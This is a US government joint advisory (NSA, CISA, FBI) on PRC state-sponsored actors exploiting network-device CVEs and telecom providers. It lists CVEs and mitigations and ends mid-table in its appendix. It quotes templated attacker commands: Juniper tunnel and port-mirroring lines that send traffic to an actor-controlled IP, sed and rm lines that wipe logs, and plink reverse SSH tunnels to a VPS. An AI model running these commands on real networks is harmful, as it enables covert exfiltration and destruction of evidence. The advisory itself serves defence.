AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

Cybersecurity
Original release date: June 7, 2022 | Last revised: June 10, 2022<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><b>Best Practices</b><br />
• Apply patches as soon as possible<br />
• Disable unnecessary ports and protocols<br />
• Replace end-of-life infrastructure<br />
• Implement a centralized patch management system</p>

<p>This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.</p>

<p>This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).</p>

<p>Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.</p>

<p>NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.</p>

<p>For more information on PRC state-sponsored malicious cyber activity, see CISA’s <a href="https://www.cisa.gov/uscert/china">China Cyber Threat Overview and Advisories</a> webpage.</p>

<p><a href="https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF">Click here</a>&nbsp;for PDF.</p>

<h3>Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors</h3>

<p>PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.</p>

<p>Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [<a href="https://attack.mitre.org/techniques/T1133/">T1133</a>] &nbsp;or public facing applications [<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.&nbsp;</p>

<p>PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.</p>

<p>These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.</p>

<p>NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.</p>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th colspan="3" scope="col">Vendor&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CVE&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Vulnerability Type</th>
</tr>
</thead>
<tbody>
<tr>
<td rowspan="3" scope="col" style="text-align: left;">Cisco</td>
<td scope="col" style="text-align: left;">CVE-2018-0171</td>
<td scope="col" style="text-align: left;">Remote Code Execution</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">CVE-2019-15271</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">CVE-2019-1652</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">Citrix</td>
<td scope="col" style="text-align: left;">CVE-2019-19781</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">DrayTek</td>
<td scope="col" style="text-align: left;">CVE-2020-8515</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">D-Link</td>
<td scope="col" style="text-align: left;">CVE-2019-16920</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">Fortinet</td>
<td scope="col" style="text-align: left;">CVE-2018-13382</td>
<td scope="col" style="text-align: left;">Authentication Bypass</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">MikroTik</td>
<td scope="col" style="text-align: left;">CVE-2018-14847</td>
<td scope="col" style="text-align: left;">Authentication Bypass</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">Netgear</td>
<td scope="col" style="text-align: left;">CVE-2017-6862</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td rowspan="2" scope="col" style="text-align: left;">Pulse</td>
<td scope="col" style="text-align: left;">CVE-2019-11510</td>
<td scope="col" style="text-align: left;">Authentication Bypass</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">CVE-2021-22893</td>
<td scope="col" style="text-align: left;">RCE</td>
</tr>
<tr>
<td rowspan="4" scope="col" style="text-align: left;">QNAP</td>
<td scope="col" style="text-align: left;">CVE-2019-7192</td>
<td scope="col" style="text-align: left;">Privilege Elevation</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">CVE-2019-7193</td>
<td scope="col" style="text-align: left;">Remote Inject</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">CVE-2019-7194</td>
<td scope="col" style="text-align: left;">XML Routing Detour Attack</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">CVE-2019-7195</td>
<td scope="col" style="text-align: left;">XML Routing Detour Attack</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">Zyxel</td>
<td scope="col" style="text-align: left;">CVE-2020-29583</td>
<td scope="col" style="text-align: left;">Authentication Bypass</td>
</tr>
</tbody>
</table>

<h3>Telecommunications and network service provider targeting</h3>

<p>PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [<a href="https://attack.mitre.org/techniques/T1595/002/">T1595.002</a>], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.</p>

<p>Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [<a href="https://attack.mitre.org/techniques/T1078/">T1078</a>] and utilized SQL commands to dump the credentials [<a href="https://attack.mitre.org/techniques/T1555/">T1555</a>], which contained both cleartext and hashed passwords for user and administrative accounts.&nbsp;</p>

<p>Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [<a href="https://attack.mitre.org/techniques/T1119/">T1119</a>]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [<a href="https://attack.mitre.org/tactics/TA0010/">TA0010</a>]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.</p>

<p>Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [<a href="https://attack.mitre.org/techniques/T1599/">T1599</a>], capture [<a href="https://attack.mitre.org/techniques/T1020/001/">T1020.001</a>], and exfiltrate traffic out of the network to actor-controlled infrastructure.&nbsp;</p>

<p>While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:</p>

<div class="special_container">set chassis fpc &lt;slot number&gt; pic &lt;user defined value&gt; tunnel-services bandwidth &lt;user defined value&gt;<br />
set chassis network-services all-ethernet<br />
set interfaces &lt;interface-id&gt; unit &lt;unit number&gt; tunnel source &lt;local network IP address&gt;<br />
set interfaces &lt;interface-id&gt; unit &lt;unit number&gt; tunnel destination &lt;actor controlled IP address&gt;<br />
&nbsp;</div>

<p>After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.</p>

<div class="special_container">set interfaces &lt;interface-id&gt; unit &lt;unit number&gt; family inet address &lt;local network IP address subnet&gt;<br />
set routing-options static route &lt;local network IP address&gt; next-hop &lt;actor controlled IP address&gt;<br />
&nbsp;</div>

<p>PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.&nbsp;</p>

<div class="special_container">set firewall family inet filter &lt;filter name&gt; term &lt;filter variable&gt; then port-mirror<br />
set forwarding-options port-mirroring input rate 1<br />
set forwarding-options port-mirroring family inet output interface &lt;interface-id&gt; next-hop &lt;local network IP address&gt;<br />
set forwarding-options port-mirroring family inet output no-filter-check<br />
set interfaces &lt;interface-id&gt; unit &lt;unit number&gt; family inet filter input &lt;filter name&gt;<br />
set interfaces &lt;interface-id&gt; unit &lt;unit number&gt; family inet filter output &lt;filter name&gt;<br />
&nbsp;</div>

<p>Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.</p>

<div class="special_container">sed -i -e '/&lt;REGEX&gt;/d' &lt;log filepath 1&gt;<br />
sed -i -e '/&lt;REGEX&gt;/d' &lt;log filepath 2&gt;<br />
sed -i -e '/&lt;REGEX&gt;/d' &lt;log filepath 3&gt;<br />
rm -f &lt;log filepath 4&gt;<br />
rm -f &lt;log filepath 5&gt;<br />
rm -f &lt;log filepath 6&gt;<br />
&nbsp;</div>

<p>PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [<a href="https://attack.mitre.org/techniques/T1572/">T1572</a>] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [<a href="https://attack.mitre.org/techniques/T1016/001/">T1016.001</a>] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.</p>

<div class="special_container">plink.exe –N –R &lt;local port&gt;:&lt;host 1&gt;:&lt;remote port&gt; -pw &lt;user defined password&gt; -batch root@&lt;VPS1&gt; -P &lt;remote SSH port&gt;<br />
plink.exe –N –R &lt;local port&gt;:&lt;host 2&gt;:&lt;remote port&gt; -pw &lt;user defined password&gt; -batch root@&lt;VPS2&gt; -P &lt;remote SSH port&gt;<br />
&nbsp;</div>
<h3>Mitigations</h3><p>NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:</p>

<ul>
<li>Keep systems and products updated and patched as soon as possible after patches are released [<a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/">D3-SU</a>] . Consider leveraging a centralized patch management system to automate and expedite the process.</li>
<li>Immediately remove or isolate suspected compromised devices from the network [<a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/">D3-ITF</a>] [<a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/">D3-OTF</a>].</li>
<li>Segment networks to limit or block lateral movement [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation">D3-NI</a>].&nbsp;</li>
<li>Disable unused or unnecessary network services, ports, protocols, and devices [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/">D3-ACH</a>] [<a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/">D3-ITF</a>] [<a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/">D3-OTF</a>].&nbsp;</li>
<li>Enforce multifactor authentication (MFA) for all users, without exception [<a href="https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/">D3-MFA</a>].&nbsp;</li>
<li>Enforce MFA on all VPN connections [<a href="https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/">D3-MFA</a>]. If MFA is unavailable, enforce password complexity requirements [<a href="https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/">D3-SPP</a>].&nbsp;</li>
<li>Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [<a href="https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/">D3-SPP</a>].</li>
<li>Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.&nbsp;</li>
<li>Disable external management capabilities and set up an out-of-band management network [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/">D3-NI</a>].</li>
<li>Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/">D3-NI</a>].</li>
<li>Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis/">D3-NTA</a>] [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/">D3-PM</a>].</li>
<li>Ensure that you have dedicated management systems [<a href="https://d3fend.mitre.org/technique/d3f:PlatformHardening/">D3-PH</a>] and accounts for system administrators. Protect these accounts with strict network policies [<a href="https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/">D3-UAP</a>].</li>
<li>Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/">D3-PM</a>].&nbsp;</li>
<li>Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.</li>
</ul>

<h3>Resources</h3>

<p>Refer to <a href="https://us-cert.cisa.gov/china">us-cert.cisa.gov/china</a>, <a href="https://www.ic3.gov/Home/IndustryAlerts">https://www.ic3.gov/Home/IndustryAlerts</a>, and <a href="https://www.nsa.gov/cybersecurity-guidance">https://www.nsa.gov/cybersecurity-guidance</a> for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.</p>

<p>U.S. government and critical infrastructure organizations, should consider signing up for CISA’s <a href="https://www.cisa.gov/cyber-hygiene-services">cyber hygiene services</a>, including vulnerability scanning, to help reduce exposure to threats.</p>

<p>U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including <a href="https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/PDNS/">Protective Domain Name System</a> (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email <a href="http://www.fbi.gov/contact-us/field">dib_defense@cyber.nsa.gov</a>.</p>

<h3>Additional References</h3>

<ul>
<li>CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. <a href="https://www.cisa.gov/uscert/ncas/alerts/aa22-137a">https://www.cisa.gov/uscert/ncas/alerts/aa22-137a</a></li>
<li>CISA (2022) 2021 Top Routinely Exploited Vulnerabilities. <a href="https://www.cisa.gov/uscert/ncas/alerts/aa22-117a">https://www.cisa.gov/uscert/ncas/alerts/aa22-117a</a></li>
<li>NSA (2021), Selecting and Hardening Remote Access VPN Solutions. <a href="https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF ">https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF&nbsp;</a></li>
<li>NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. <a href="https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF">https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF</a>&nbsp;</li>
<li>CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. <a href="https://www.cisa.gov/uscert/ncas/alerts/aa21-110a">https://www.cisa.gov/uscert/ncas/alerts/aa21-110a</a></li>
<li>NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. <a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF</a>&nbsp;</li>
<li>CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. <a href="https://www.cisa.gov/uscert/ncas/alerts/aa20-258a">https://www.cisa.gov/uscert/ncas/alerts/aa20-258a&nbsp;</a></li>
<li>NSA (2020), Performing Out-of-Band Network Management. <a href="https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF">https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF</a>&nbsp;</li>
<li>CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. <a href="https://www.cisa.gov/uscert/ncas/alerts/aa20-020a">https://www.cisa.gov/uscert/ncas/alerts/aa20-020a</a></li>
<li>NSA (2019), Mitigating Recent VPN Vulnerabilities. <a href="https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf">https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf</a>&nbsp;</li>
<li>NSA (2019), Update and Upgrade Software Immediately. <a href="https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf ">https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf&nbsp;</a></li>
</ul>

<h3>Contact Information&nbsp;</h3>

<p>To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:report@cisa.gov">report@cisa.gov</a>. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at <a href="https://us-cert.cisa.govmailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. For NSA client requirements or general cybersecurity inquiries, contact <a href="https://us-cert.cisa.govmailto:Cybersecurity_Requests@nsa.gov">Cybersecurity_Requests@nsa.gov</a>.&nbsp;</p>

<p>Media Inquiries / Press Desk:&nbsp;</p>

<ul>
<li>NSA Media Relations, 443-634-0721, <a href="https://us-cert.cisa.govmailto:MediaRelations@nsa.gov">MediaRelations@nsa.gov</a> &nbsp;</li>
<li>CISA Media Relations, 703-235-2010, <a href="https://us-cert.cisa.govmailto:CISAMedia@cisa.dhs.gov">CISAMedia@cisa.dhs.gov&nbsp;</a></li>
<li>FBI National Press Office, 202-324-3691, <a href="https://us-cert.cisa.govmailto:npo@fbi.gov">npo@fbi.gov</a>&nbsp;</li>
</ul>

<h3><em>Disclaimer of endorsement</em></h3>

<p>The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>

<h3><em>Purpose</em></h3>

<p>This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. </p>

<h3>Appendix A: Vulnerabilities</h3>

<p class="text-align-center"><strong><em>Table 2: Information on Cisco CVE-2018-0171</em></strong></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;Cisco CVE-2018-0171&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><strong><u>Vulnerability Description&nbsp;</u></strong></p>

<p>A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Cisco has released software updates that address this vulnerability.</li>
<li>In addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods</strong></u>
<ul>
<li>CISCO IOS Software Checker</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions</strong></u></p>

<p>The vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in this advisory.&nbsp;</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References</strong></u></p>

<p><a href="http://www.securityfocus.com/bid/103538">http://www.securityfocus.com/bid/103538</a><br />
<a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2</a><br />
<a href="https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04">https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04</a><br />
<a href="https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04">https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05</a><br />
<a href="https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490">https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490</a><br />
<a href="http://www.securitytracker.com/id/1040580">http://www.securitytracker.com/id/1040580</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><strong><em>Table 3: Information on Cisco CVE-2019-15271</em></strong></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;Cisco CVE-2019-15271&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;CVSS 3.0: 8.8 (High)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><strong><u>Vulnerability Description&nbsp;</u></strong></p>

<p>A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><strong><u>Recommended Mitigations&nbsp;</u></strong>
<ul>
<li>Cisco has released free software updates that address the vulnerability described in this advisory.</li>
<li>Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.</li>
<li>Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>N/A</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:</p>

<ul>
<li>RV016 Multi-WAN VPN Router</li>
<li>RV042 Dual WAN VPN Router</li>
<li>RV042G Dual Gigabit WAN VPN Router</li>
<li>RV082 Dual WAN VPN Router</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><strong><em>Table 4: Information on Cisco CVE-2019-1652</em></strong></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Cisco CVE-2019-1652&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 7.2 (High)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Cisco has released free software updates that address the vulnerability described in this advisory</li>
<li>This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.</li>
<li>If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure.</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><strong><u>Detection Methods&nbsp;</u></strong>
<ul>
<li>N/A</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

